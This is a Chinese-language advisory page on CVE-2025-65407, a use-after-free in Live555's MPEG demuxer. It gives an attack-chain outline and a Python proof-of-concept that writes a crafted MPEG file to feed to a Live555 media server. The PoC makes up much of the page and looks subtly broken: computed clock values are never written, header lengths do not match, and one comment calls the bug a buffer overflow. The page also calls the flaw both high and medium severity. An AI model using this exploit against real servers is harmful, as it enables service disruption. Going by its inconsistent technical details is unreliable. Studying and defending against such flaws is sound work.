CVE-2025-65407: Live555 MPEG1or2Demux newElementaryStream() 释放后重用漏洞

漏洞信息

漏洞编号

CVE-2025-65407

漏洞类型

Use-after-free

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Live555 Streaming Media

漏洞概述

CVE-2025-65407是Live555 Streaming Media库中的一个高危安全漏洞，位于MPEG1or2Demux::newElementaryStream()函数中。该漏洞为释放后重用（Use-after-free）类型，攻击者可以通过提供精心构造的恶意MPEG Program Stream（节目流）来触发此漏洞。当Live555处理特制的MPEG流数据时，函数在释放某个内存对象后继续引用该内存地址，导致程序访问已释放的内存区域。这不仅可能造成应用程序崩溃（Denial of Service），还可能被攻击者利用来执行任意代码或获取敏感信息。鉴于CVSS评分为6.5（中危），且攻击复杂度较低，攻击者可以远程利用此漏洞，对使用Live555库的多媒体服务器、视频监控系统等应用构成威胁。

技术细节

该漏洞源于Live555 Streaming Media v2018.09.02中MPEG1or2Demux组件的newElementaryStream()函数存在内存管理缺陷。当解析MPEG Program Stream时，函数会动态分配内存用于存储基本流（Elementary Stream）信息。在某些条件下，函数错误地释放了一个指针，但在后续代码执行中仍然尝试访问该已释放的内存地址，形成Use-after-free条件。攻击者可通过构造包含特定MPEG节目流标识符和错误的时间戳或流参数的恶意文件，触发内存释放和后续访问。当程序执行到被释放内存的访问点时，会触发SIGSEGV或SIGABRT信号，导致进程崩溃。攻击者只需诱导用户或自动系统处理该恶意MPEG流即可实现DoS攻击，无需特殊权限。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意构造的MPEG Program Stream的特制文件，通过在PES头部注入异常的时间戳和流参数触发Live555的内存管理缺陷

STEP 2

步骤2

受害者通过Live555应用程序（如RTSP服务器、视频监控系统）打开或处理该恶意MPEG文件

STEP 3

步骤3

Live555的MPEG1or2Demux组件解析MPEG流时，newElementaryStream()函数分配内存并创建流对象

STEP 4

步骤4

在特定条件下，函数错误地释放了流对象指针，但保留了对其的引用用于后续处理

STEP 5

步骤5

当代码尝试访问已释放的流对象时，触发Use-after-free条件，导致程序访问无效内存

STEP 6

步骤6

程序崩溃，产生Denial of Service（DoS）效果；攻击者可能进一步利用此条件执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-65407 PoC - Live555 MPEG1or2Demux Use-after-Free
This PoC generates a crafted MPEG Program Stream that triggers
use-after-free in Live555's MPEG1or2Demux::newElementaryStream()
"""
import struct
import sys

def create_crafted_mpeg_ps():
    """Generate a malicious MPEG Program Stream"""
    
    # Pack Header - Program Stream pack
    pack_header = bytearray()
    pack_start_code = 0x000001BA  # Pack start code
    pack_header.extend(struct.pack('>I', pack_start_code))
    
    # System clock reference (SCR) - manipulated for trigger
    scr = 0x0000000000  # Simplified SCR
    scr_base = (scr >> 30) & 0x7FFFFFFF
    scr_extension = scr & 0x1FF
    
    # Pack stuffing - trigger condition
    stuffing = b'\x00' * 16  # Padding to reach vulnerable code path
    
    # System header - Program Stream system header
    system_header = bytearray()
    system_header_start = 0x000001BB  # System header start code
    system_header.extend(struct.pack('>I', system_header_start))
    
    header_length = 12
    system_header.extend(struct.pack('>H', header_length))
    
    # Rate bound and audio/video bounds - crafted values
    system_header.extend(struct.pack('>I', 0x0000FFFF))  # Rate bound
    system_header.extend(b'\xC0\x00')  # Fixed flags
    system_header.extend(struct.pack('>H', 0xFFFF))  # Audio bounds
    system_header.extend(struct.pack('>H', 0xFFFF))  # Video bounds
    
    # PES packet - triggers newElementaryStream()
    pes_header = bytearray()
    pes_start = 0x000001E0  # Video stream ID
    pes_header.extend(struct.pack('>I', pes_start))
    
    # PES packet length - causes buffer overflow in stream handling
    pes_length = 0xFFFF
    pes_header.extend(struct.pack('>H', pes_length))
    
    # Crafted PES header to trigger use-after-free
    # PTS (Presentation Time Stamp) manipulation
    pts = 0x2000000000  # Invalid PTS causing memory corruption
    pts_bytes = bytes([
        0x21,  # PTS_DTS flags
        ((pts >> 30) & 0x0E) | 0x21,
        ((pts >> 22) & 0xFF),
        ((pts >> 14) & 0xFE) | 0x01,
        ((pts >> 7) & 0xFF),
        ((pts << 1) & 0xFE) | 0x01
    ])
    pes_header.extend(pts_bytes)
    
    # Padding data to trigger stream cleanup
    payload = b'\xFF' * 1024  # Padding bytes
    
    # Combine all parts
    malicious_ps = bytes(pack_header) + stuffing + bytes(system_header) + bytes(pes_header) + payload
    
    return malicious_ps

def main():
    print("[*] CVE-2025-65407 PoC Generator")
    print("[*] Target: Live555 Streaming Media v2018.09.02")
    print("[*] Vulnerability: Use-after-free in MPEG1or2Demux::newElementaryStream()")
    
    # Generate the malicious MPEG Program Stream
    malicious_data = create_crafted_mpeg_ps()
    
    # Save to file
    output_file = "CVE-2025-65407.mpg"
    with open(output_file, 'wb') as f:
        f.write(malicious_data)
    
    print(f"[+] Generated malicious MPEG PS: {output_file}")
    print(f"[+] File size: {len(malicious_data)} bytes")
    print("[+] Usage: Feed this file to a Live555-based media server")

if __name__ == "__main__":
    main()

影响范围

Live555 Streaming Media v2018.09.02

防御指南

临时缓解措施

在官方补丁发布前，建议限制对MPEG Program Stream的直接处理；对于必须处理MPEG流的场景，应在独立的沙箱环境中进行，并启用严格的输入验证。同时监控应用程序的内存使用情况，及时发现异常崩溃行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65407
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65407
3 Details https://www.cvedetails.com/cve/CVE-2025-65407/
4 VulDB https://vuldb.com/cve/CVE-2025-65407
5 Link https://github.com/rgaufman/live555
6 Link https://shimo.im/docs/VMAPLVLpzZcZvoAg